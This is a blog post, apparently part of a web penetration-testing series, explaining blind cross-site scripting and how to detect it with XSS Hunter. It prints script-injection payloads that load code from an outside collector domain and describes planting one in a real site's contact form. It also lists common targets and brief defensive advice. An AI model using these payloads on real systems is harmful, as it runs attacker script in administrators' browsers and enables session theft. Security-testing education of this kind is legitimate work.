Blind Cross Site Scripting

Hello Friends!

This is my 31st blog on web application security penetration testing. In this blog I will explain about Blind Cross Site Scripting.

In my last blog, I have explained about DOM Based Cross Site Scripting. Hope everyone liked it. If you haven’t read it yet please follow along.

What is Blind XSS?

It is a type of stored XSS where attackers input is saved by server and is reflected in a totally different application used by system admin/team member.

How to Test for Blind XSS?

1. Sign up on XSS hunter. https://xsshunter.com/

2. Upon signing up you will create a special xss.ht short domain such as yoursubdomain.xss.ht which identifies your XSS vulnerabilities and hosts your payload.

3. You then use this subdomain in your XSS testing, using injection attempts such as "><script src=//yoursubdomain.xss.ht></script>. XSS Hunter will automatically serve up XSS probes and collect the resulting information when they fire.

4. In my case it is “><script src=https://testmaddy.xss.ht></script> When you inject this script in any website xsshunter automatically will probe that website for all kind of xss and will send report on your xsshunter account.

5. Attack Vectors are, searchQueryParameter, DataStoredFields, Contact/feedback page, Chat Applications, EmailApplications, etc.

Blind XSS Testing Tools:

  1. XSS Hunter

2. KNOXSS

3. Burp Collaborator

4. bXSS

I am using XSS hunter for testing blind XSS, Below is the step by step POC:

To honor confidentiality let’s consider the domain name as redacted.com

  1. I have navigated to Contact US form and entered Blind XSS payload in the Name field and submitted the web form.

2. Navigate to the XSS hunter app and in the payload section you will have all the list of payload which can be used in the different context of the web page.

3. After submitting blind XSS payload in the Name field, After some days I have received email notification stating that XSS payload is fired on the web page along with details of the vulnerable domain where I have submitted payload.

payload used: “><script src=https://myusername.xss.ht></script>

4. I have immediately logged in to the XSS hunter application and same information which I have received via email was present in the “XSS fires” section.

I have tested it on so many application and received XSS fire notification many times.

Impact:

Many different attacks can be leveraged through the use of cross-site scripting, including:

Hijacking user’s active session.

Mounting phishing attacks.

Intercepting data and performing man-in-the-middle attacks.

Some Common Targets for Blind XSS:

Contact/Feedback pages

Log viewers

Exception handlers

Chat applications / forums

Customer ticket applications

Web Application Firewalls

Any application that requires user moderation

Customer service applications

Recommendation:

Like the offensive side, the defensive side is also very important in security.
So here are some defensive sides or prevention steps to save your web application from Blind XSS.

The most common and effective way to accomplish this is by web developers who review the code and ensure that any user input is properly filtered.

You need a specialized tool that performs innocuous penetration testing, which apart from detecting the easy to detect XSS vulnerabilities.

If your website is implemented using the latest technology such as HTML 5 or you ensure that your web server is fully patched, the web application may still be vulnerable to XSS.

It is good coding practice to never trust data provided by the user.

References:

1. POC Reference: https://hackerone.com/reports/275518

2. Other References: https://hackerone.com/reports/314126 https://mhmdiaa.github.io/blind-xss-in-spotify/

3. Best Resource: https://brutelogic.com.br/blog/blind-xss-code/

I hope everyone like it and if you people face any difficulty please do let me know via comment.

Please do like and follow for more reads!

Thanks!

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store